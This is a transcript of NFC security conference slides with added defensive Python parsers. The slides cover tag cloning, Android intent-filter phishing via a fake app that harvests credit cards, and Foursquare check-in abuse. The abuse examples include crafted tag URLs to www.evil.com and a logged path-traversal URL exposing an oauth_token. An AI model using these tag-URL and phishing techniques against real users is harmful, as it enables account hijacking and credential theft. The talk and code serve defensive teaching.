Corey Benninger Max Sobell - CanSecWest 101 IG - 20120308 - CSW.pdf

Corey Benninger, Max Sobell

May 23, 2018

Transcript
Page 1:

Corey Benninger Max Sobell

Page 2:

NFC Overview

What is NFC?

Hardware basics behind NFC

Antennas and waveforms

Tags and access control

NFC Data Exchange Format (NDEF)

NFC Application Attacks

Privacy

Mobile Wallets

Page 3:

RFID technology ISO 14443-1:4 (13.56 MHz)

▪ Physical characteristics

▪ Radio frequency power and signal interface

▪ Initialization and anti-collision

▪ Transmission protocol

No encryption or access control!

Devices:

Powered: PCD, interrogator, reader, device

Unpowered: PICC, target, tag, transponder

http://www.mockingweb.com/wp-content/uploads/2011/11/Near-field-communcation.png

Page 4:

Page 5:

RFID:

125 KHz/13.56 MHz/900 MHz

NFC (what we’ll be focusing on):

A type of RFID

Short range (induction v backscatter)

Enough computational power to perform basic crypto

Page 6:

!=

Don’t think of NFC like “proximity cards”. NFC can mimic these, but often NFC is much more complex.

Page 7:

NFC enabled posters.

Page 8:

Page 9:

Page 10:

Phone Hardware

Radio (ISO 14443)

Phone OS Software

Protocol: APDU, SNEP

Data: NDEF

Market Applications

Foursquare, DoubleTwist, PayPal, Park Mobile, etc…

Page 11:

Replace a traditional antenna with coils of wire

Samsung Nexus S

Samsung Galaxy Nexus (in the battery)

Page 12:

Energy one way, data two ways

http://www.eurasip.org/Proceedings/Ext/RFID2007/pdf/s1p4.pdf

Page 13:

Inductive Coupling

Current device ranges severely limited (4-10 cm)

Near Field: wavelength (~20m) much longer than antenna diameter

Kristin Paget: 900 MHz read ranges > 66 meters

That is not NFC

NFC theoretically limited to ~10m

Page 14:

Encoding: ASK

Reader -> Tag: Modified Miller @ 100% ASK

Tag -> Reader: Manchester @ 10% ASK

Baudrates: 106 kbps, 212 kbps, 424 kbps, 848 kbps

Page 15:

Page 16:

Tag: 10% ASK, Reader: 100% ASK

Page 17:

Each Tag has a UID – unique identifier

Serial number for card

▪ Locked on physical tags

▪ but not on a $80 Chinese-manufactured knock-off card

Can be cloned using an emulated card

More than just memory sectors

Reader sends requests to read and write data from tag

Tag can deny request based on access controls


Page 18:

Mifare Tags

If you want access control, go with DESFire EV1 (for now)

"Breaking Mifare DESFire MF3ICD40: Power Analysis and Templates in the Real World" by David Oswald and Christof Paar

Tag           Locked for Writing   Access Control   Broken   Year Broken
Ultralight    1                    0                0
Classic       1                    1                1        2008
DESFire       1                    1                1        2011
DESFire EV1   1                    1                0

Page 19:

Phone Hardware

Radio (ISO 14443)

Phone OS Software

Protocol: APDU, SNEP

Data: NDEF

Market Applications

Foursquare, DoubleTwist, PayPal, Park Mobile, etc…

Page 20:

NDEF – NFC Data Exchange Format

Specs come from NFC Forum

▪ www.nfc-forum.org

NDEF Message contains NDEF Record(s)

Common record types

▪ Text

▪ URI

  ▪ 0x00 through 0x23 to map bytes to prefixes.

▪ Smart Poster

  ▪ Text and URIs

Page 21:

Decimal   Hex           Protocol
0         0x00          N/A. No prepending
1         0x01          http://www.
2         0x02          https://www.
3         0x03          http://
4         0x04          https://
5         0x05          tel://
…         …             …
11        0x0B          smb://
12        0x0C          nfs://
13        0x0D          ftp://
27        0x1B          tcpobex://
36-255    0x23 – 0xFF   RFU

Section 3.2.2 of NFCForum URI 1.0 spec

Page 22:

D1 01 0D 55 05 2B 31 35 35 35 31 32 33 34 35 36 37 FE

D1: record begin

01: length of payload length

▪ 0D: payload length

▪ 55: payload type (URI)

▪ 05: payload identifier (tel:// prefix)

▪ 2B->37: payload (“+15551234567”)

FE: terminal value character
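Decoding the record above by hand is fine once, but an app has to do it in code. The following Python is an added example (not from the slides): it parses the short record using the NFC Forum URI prefix table, checks every length field against the bytes actually present, and re-encodes a URI back to the same bytes. The prefix strings follow the URI RTD (which writes 0x05 as "tel:"), and the decoder reads the second header byte as the type length, per the NDEF record layout.

```python
# Added example, not from the slides: decode and re-encode the NDEF URI record
# from the slide with the NFC Forum URI RTD prefix table. In the NDEF record
# layout the second byte is the TYPE length (0x01: one-byte type "U") and the
# third byte is the payload length; the RTD writes prefix 0x05 as "tel:".

URI_PREFIXES = {
    0x00: "", 0x01: "http://www.", 0x02: "https://www.", 0x03: "http://",
    0x04: "https://", 0x05: "tel:", 0x06: "mailto:",
    0x07: "ftp://anonymous:anonymous@", 0x08: "ftp://ftp.", 0x09: "ftps://",
    0x0A: "sftp://", 0x0B: "smb://", 0x0C: "nfs://", 0x0D: "ftp://",
    0x0E: "dav://", 0x0F: "news:", 0x10: "telnet://", 0x11: "imap:",
    0x12: "rtsp://", 0x13: "urn:", 0x14: "pop:", 0x15: "sip:", 0x16: "sips:",
    0x17: "tftp:", 0x18: "btspp://", 0x19: "btl2cap://", 0x1A: "btgoep://",
    0x1B: "tcpobex://", 0x1C: "irdaobex://", 0x1D: "file://",
    0x1E: "urn:epc:id:", 0x1F: "urn:epc:tag:", 0x20: "urn:epc:pat:",
    0x21: "urn:epc:raw:", 0x22: "urn:epc:", 0x23: "urn:nfc:",
}
TNF_WELL_KNOWN = 0x01


def decode_uri_record(data: bytes) -> dict:
    """Parse one short NDEF URI record (SR=1) and expand its prefix byte.

    Every length field is checked against the bytes present, so a tag that
    lies about its lengths raises instead of being trusted.
    """
    if len(data) < 4:
        raise ValueError("too short for an NDEF short-record header")
    flags = data[0]
    if not flags & 0x10:                      # SR bit: one-byte payload length
        raise ValueError("only short records are handled here")
    type_len, payload_len = data[1], data[2]
    pos, id_len = 3, 0
    if flags & 0x08:                          # IL bit: an ID length byte follows
        id_len, pos = data[3], 4
    rec_type = data[pos:pos + type_len]
    pos += type_len + id_len
    payload = data[pos:pos + payload_len]
    if len(rec_type) != type_len or len(payload) != payload_len:
        raise ValueError("length field exceeds the bytes available")
    if (flags & 0x07) != TNF_WELL_KNOWN or rec_type != b"U":
        raise ValueError("not a well-known URI ('U') record")
    if not payload:
        raise ValueError("URI record with empty payload")
    code = payload[0]
    if code not in URI_PREFIXES:
        raise ValueError(f"reserved URI prefix code 0x{code:02X}")
    end = pos + payload_len
    return {
        "begin": bool(flags & 0x80), "end": bool(flags & 0x40),
        "payload_len": payload_len, "prefix_code": code,
        "uri": URI_PREFIXES[code] + payload[1:].decode("utf-8"),
        # 0xFE is the Terminator TLV that closes the tag's data area
        "terminated": end < len(data) and data[end] == 0xFE,
    }


def encode_uri_record(uri: str) -> bytes:
    """Build the matching short record, using the longest prefix that applies."""
    code, prefix = max(((c, p) for c, p in URI_PREFIXES.items()
                        if uri.startswith(p)), key=lambda cp: len(cp[1]))
    payload = bytes([code]) + uri[len(prefix):].encode("utf-8")
    if len(payload) > 255:
        raise ValueError("payload too long for a short record")
    return bytes([0xD1, 0x01, len(payload), 0x55]) + payload + b"\xFE"


# The record exactly as printed on the slide
SLIDE_RECORD = bytes.fromhex("D1010D55052B3135353531323334353637FE")
```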

Page 23:

Google Tags Application crash*

NDEF Stack built in to Android

* On Gingerbread. Java level parsing crash, not exploitable

Page 24:

Phone Hardware

Radio (ISO 14443)

Phone OS Software

Protocol: APDU, SNEP

Data: NDEF

Market Applications

Foursquare, DoubleTwist, PayPal, Park Mobile, etc…

Page 25:

Collin Mulliner – (www.mulliner.org)

Python code for working with Nokia 6313 NFC and Nokia 6212 Classic

Francois Kooman, Roel Verdult

Using NFC to trigger bluetooth and file transfers

Nick von Dadelszen - (www.lateralsecurity.com)

Kiwicon 2011 - Mobile point of sales reader w/ RFIDIOt

Page 26:

Messing with posters

Access control set?

Read-only option?

Physical protection?

Page 27:

Page 28:

Countermeasures

Altering data: Use write locking or access control

Zapping/DoS: ???

“Counterfeit” tags: NFC Signature Record Type Definition Technical Specification

▪ Each record is signed

▪ Issues with Franken-tags, cloning, signature-checking...

White-list of UIDs

▪ Mgmt pains

Page 29:

Blackberry requires two clicks to open URL

Page 30:

Push for Zero Click NFC integration

Some URIs require no user interaction

▪ Contacts, URLs, Market

“Beam” data from device to device

▪ Pass NDEF messages instead of emulating tags

▪ Simple NDEF Exchange Protocol (SNEP)

Page 31:

What if the user does not need to click, only tap?

http://developer.android.com/guide/topics/nfc/nfc.html#ndef

Page 32:

Register a detailed intent filter in the app’s AndroidManifest.xml

No interaction needed when scanning a URL with http://local.google.com/maps

What prevents a malicious application from also requesting this intent?

Page 33:

We can craft our own icon and title for our registered intent filter

Can you tell which is the real maps application?

NOTE: See Android Application Records, introduced in Android 4.0 (API level 14) for countermeasure

Page 34:

AAR from Google:

“If no application can start with the AAR, go to the Android Market to download the application based on the AAR.”

Set Android Application Record

Our application in the market

Add our own tag (Bigger! On the front!)

Successfully phished!

Page 35:

The tag:

NDEF URL Record: http://porkmobile.com

AAR: com.porkmobile

The app:

Webview to our server

Collect: credit cards, logins, etc…

Countermeasures: In Google’s market…

Page 36:

Developing an app accepting NDEF data?

Treat the NDEF data as untrusted. Validate like any user supplied data.

Example: Foursquare added NFC check-ins.

http://m.foursquare.com/checkin?venueID=27016678&venueName=Time%20Square%20New%20York

Page 37:

VenueID was not validated to match VenueName before check-in was submitted

Can’t trust tag data

• Fixed in version: 2011.08.11 – removed NFC check-in

• Collin Mulliner @ NinjaCon 2011

Page 38:

Don’t blindly pass a URL (or data) from a tag

What if… Intent filter “api.foursquare.com”

Your user is persistently logged in

Expect “http://api.foursquare.com/checkin?venueId=1”

But get

▪ http://api.foursquare.com/account/addfriend?userId=666

▪ http://api.foursquare.com/redirect?domain=www.evil.com

▪ Is your authentication token added to the URL?
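One way to apply "don't blindly pass a URL from a tag" to the check-in case from the last three slides, as an added Python example (not the app's own code): only the venue id is taken from the tag, host and path must match exactly, any extra parameter such as an oauth_token is grounds for rejection, and the API request is rebuilt from the validated value with the token sent in a header rather than the URL. The https endpoint and the Authorization header name are assumptions.

```python
# Added example, not from the slides: never forward a tag-supplied URL to an
# authenticated client. Extract the one value the app needs (the venue id),
# reject everything else, and rebuild the request yourself. Host, path and
# parameter name are the slide's example; the header name is an assumption.
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

ALLOWED_HOSTS = {"api.foursquare.com"}
ALLOWED_PATHS = {"/checkin"}      # exact match: no /account/addfriend, no /redirect
VENUE_ID = re.compile(r"^[0-9]{1,12}$")


def venue_id_from_tag(tag_url: str) -> Optional[int]:
    """Return the venue id if the URL is exactly a check-in URL, else None."""
    try:
        parts = urlsplit(tag_url)
        port = parts.port                     # raises ValueError on a junk port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https"):
        return None
    # user@host tricks and explicit ports never appear in a legitimate tag URL
    if parts.username or parts.password or port is not None:
        return None
    if parts.hostname not in ALLOWED_HOSTS:   # also rejects api.foursquare.com.evil.com
        return None
    # exact path only: "/v2/venues/1/..\..\" style traversal never matches
    if parts.path not in ALLOWED_PATHS or parts.fragment:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if set(params) != {"venueId"} or len(params["venueId"]) != 1:
        return None                           # no oauth_token=, domain=, userId=, duplicates
    value = params["venueId"][0]
    if not VENUE_ID.match(value):
        return None
    return int(value)


def build_checkin_request(venue_id: int, token: str) -> tuple:
    """Rebuild the request from validated parts; the token goes in a header, not the URL."""
    url = f"https://api.foursquare.com/checkin?venueId={venue_id}"
    headers = {"Authorization": f"Bearer {token}"}   # header name is an assumption
    return url, headers
```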

Page 39:

ERROR/VenueActivity(536): java.lang.IllegalArgumentException: Illegal character in path at index 42: https://api.foursquare.com/v2/venues/1/..\..\..\..\www.evil.com?oauth_token=4CXOTLA50WHDKOJUGS4GQQ1XBINTPX5DSCFSRVARFH5YXE0O&v=20110525

Page 40:

“NFCShortcuts” app on Blackberry never writes to the tags

Triggers based off UID

Limits the attack surface

Page 41:

Page 42:

NFC as a privacy concern?

Smartphone has all the megabits anyway, right?

Can be as good as GPS data

Reading a UID at a specific time may put you at a specific location

Transaction data at a Point of Sales could be sensitive (you spent how much where?)

Who your friends are (or what devices your friends have)

Page 43:

Reading an NFC tag generates an intent

seen in logcat, but not recorded to file system

Default “Tags” app

Stores tag and timestamp

/data/data/com.google.android.tag/databases/tags.db

Page 44:

Data can be left behind on tags from previous writes

Make sure to zero out or format used tag

NDEF terminal value character, length fields

▪ Have to read sector by sector
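An added Python example (not from the slides) of the sector-by-sector check described above: it walks the Type 2 tag TLV area, stops at the 0xFE terminator, reports whatever a previous longer write left behind it, and builds the zeroed image to write back. The dump is constructed for the example: a short tel: record written over a longer URL record.

```python
# Added example, not from the slides: scan a dumped tag data area (the
# concatenation of the sector/page reads) for bytes left behind after the NDEF
# message. Layout is the NFC Forum Type 2 tag TLV area: 0x03 <len> <message>,
# 0xFE terminator, then whatever an earlier, longer write left in place.
# A reader that honours the length fields never sees those bytes; a sector
# dump does. The dump at the bottom is constructed for this example.


def find_residual(data_area: bytes) -> tuple:
    """Walk the TLV area; return (ndef_message, residual_bytes, terminator_offset)."""
    ndef, pos = b"", 0
    while pos < len(data_area):
        tag = data_area[pos]
        if tag == 0x00:                         # NULL TLV: one padding byte
            pos += 1
            continue
        if tag == 0xFE:                         # Terminator TLV: live data ends here
            tail = data_area[pos + 1:]
            return ndef, tail.rstrip(b"\x00"), pos
        if pos + 1 >= len(data_area):
            raise ValueError("TLV header cut off")
        length, pos = data_area[pos + 1], pos + 2
        if length == 0xFF:                      # three-byte length form
            length, pos = int.from_bytes(data_area[pos:pos + 2], "big"), pos + 2
        value = data_area[pos:pos + length]
        if len(value) != length:
            raise ValueError("TLV length runs past the end of the data area")
        if tag == 0x03:                         # NDEF Message TLV
            ndef = value
        pos += length
    raise ValueError("no Terminator TLV: cannot tell where live data ends")


def wipe_residual(data_area: bytes) -> bytes:
    """Image to write back: identical up to and including the terminator, zeros after."""
    _, _, term = find_residual(data_area)
    return data_area[:term + 1] + b"\x00" * (len(data_area) - term - 1)


# Constructed 48-byte data area: an older URL record (http:// + example.com/secret)
# was written first, then the shorter tel: record from the NDEF slide on top of it.
OLD_IMAGE = (b"\x03\x17" + b"\xD1\x01\x13\x55\x03" + b"example.com/secret"
             + b"\xFE").ljust(48, b"\x00")
NEW_MESSAGE = b"\x03\x11" + bytes.fromhex("D1010D55052B3135353531323334353637") + b"\xFE"
DUMP = NEW_MESSAGE + OLD_IMAGE[len(NEW_MESSAGE):]
```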

Page 45:

Page 46:

How do you protect credit card info on your phone from…

other software listening for NFC tags?

“droid dream” like malware and other rooted applications?

a stolen device?

Page 47:

Yo Dawg, I heard you like computers

▪ Runs a base operating system

▪ Embedded applications

▪ Simple communication interface

▪ Strong crypto and access control

  ▪ Pre-shared key known to the SE “owner”

Even if your device is rooted, you won’t have full access to the SE

http://code.google.com/p/seek-for-android/

Page 49:

APDU - Application Protocol Data Unit (ISO7816-4)

Defines the communication between OS applications and applets in the Secure Element

BH08 - Ivan Buetler “SmartCard APDU Analysis”

Google Wallet Example

send: 00 A4 04 00 00

▪ 5 bytes (SELECT [default CardManager])

recv: 6F 65 84 08 A0 00 00 00 03 00 00 00 ... 90 00

▪ “90 00” - OK
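An added Python example (not from the slides and not Google Wallet code) that parses the SELECT above and checks a response the way a harness on the SE bus would: status word first, then the FCI template, so a non-9000 reply or a malformed TLV is rejected rather than trusted. The response body is constructed, since the slide elides most of it; only the AID it carries comes from the slide, and the function names are the example's own.

```python
# Added example, not from the slides: split a command APDU into its fields,
# split a response into data + status word, and pull the selected AID out of
# the FCI template only after the status word says OK. The response below is
# constructed (the slide shows "..." for most of it); the AID is the slide's.
from typing import Dict

SW_MEANINGS = {0x9000: "OK", 0x6A82: "file or application not found",
               0x6982: "security status not satisfied", 0x6D00: "INS not supported"}


def parse_command_apdu(raw: bytes) -> Dict:
    """Split a short-form command APDU into header, Lc data and Le."""
    if len(raw) < 4:
        raise ValueError("command APDU needs CLA INS P1 P2")
    cla, ins, p1, p2 = raw[:4]
    body, data, le = raw[4:], b"", None
    if len(body) == 1:                          # case 2: only Le (0x00 means 256)
        le = body[0]
    elif len(body) > 1:                         # case 3/4: Lc, data, optional Le
        lc, data, rest = body[0], body[1:1 + body[0]], body[1 + body[0]:]
        if len(data) != lc or len(rest) > 1:
            raise ValueError("Lc does not match the bytes present")
        le = rest[0] if rest else None
    return {"cla": cla, "ins": ins, "p1": p1, "p2": p2, "data": data, "le": le}


def parse_response_apdu(raw: bytes) -> Dict:
    """Last two bytes are the status word SW1 SW2; everything before is data."""
    if len(raw) < 2:
        raise ValueError("response has no status word")
    sw = int.from_bytes(raw[-2:], "big")
    return {"data": raw[:-2], "sw": sw, "ok": sw == 0x9000,
            "meaning": SW_MEANINGS.get(sw, f"unknown SW {sw:04X}")}


def ber_tlv_children(blob: bytes) -> Dict[int, bytes]:
    """Minimal BER-TLV walk: one-byte tags, short-form lengths (< 0x80)."""
    out, pos = {}, 0
    while pos < len(blob):
        if pos + 1 >= len(blob):
            raise ValueError("cut-off TLV header")
        tag, length = blob[pos], blob[pos + 1]
        if length >= 0x80:
            raise ValueError("long-form length not handled here")
        value = blob[pos + 2:pos + 2 + length]
        if len(value) != length:
            raise ValueError("TLV length exceeds the data")
        out[tag] = value
        pos += 2 + length
    return out


def selected_aid(response: bytes) -> bytes:
    """AID (tag 84) from the FCI template (tag 6F); refuses anything but SW 9000."""
    r = parse_response_apdu(response)
    if not r["ok"]:
        raise ValueError(f"SELECT failed: {r['meaning']}")
    fci = ber_tlv_children(r["data"])
    if 0x6F not in fci:
        raise ValueError("no FCI template (6F) in SELECT response")
    return ber_tlv_children(fci[0x6F]).get(0x84, b"")


SELECT_CMD = bytes.fromhex("00A4040000")       # the command from the slide
SELECT_RESPONSE = bytes.fromhex("6F0D8408A000000003000000A501009000")  # constructed
```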

Page 50:

Free $10 for contactless payments

Early build - lots of debug code

▪ BS Bank

▪ <- Debug Menu

ViaForensics post stored data

Can work on a NS 4G or NS or Galaxy Nexus (thanks XDA!)

▪ Non-root builds mean signed by Google

http://intrepidusgroup.com/insight/2011/09/a-brave-new-wallet-first-look-at-decompiling-google-wallet/

Page 52:

Don’t trust your user-land application

Keep payment secrets in the secure element

Keep lockout counts in the secure element

Do sensitive operations in the secure element

▪ Pin verification

Treat the bus to the secure element as insecure

“Hidden” APDUs will be found

▪ By monitoring or fuzzing

Page 54:

For Android: The NFC antenna in your phone is only activated when the screen is powered on*

* For Google Nexus devices, although some NFC chips may work in “low power” or “no power” modes.

Page 55:

Blackberry w/ NFC: The default is to ALLOW card emulation when LOCKED or POWERED OFF! *

* The BB Device does not appear to “read” or take actions on tags in locked or powered off modes

Page 56:

Holman’s tap works to grab your own Google Wallet number… if your device is on, unlocked, passcode entered, and before it times out

i.e. good countermeasures against IRL attacks

Page 57:

Positives

Can disable the radio

▪ (can’t turn off physical cards)

GPS to find my credit card

Easier to see transaction history

▪ Or current balances

Gives you more security control than physical cards

▪ Device passcode

Page 58:

NFC: it can be another vector to mobile devices and apps

Developers beware! Untrusted data!

Pen-Testers: It’s just getting started…

Questions?

Thank you to: Jason Ross @ IG, Collin @ www.mulliner.org, RFnoID @ Stevens

Our Blog http://www.intrepidusgroup.com/insight

@0xbenn @msobell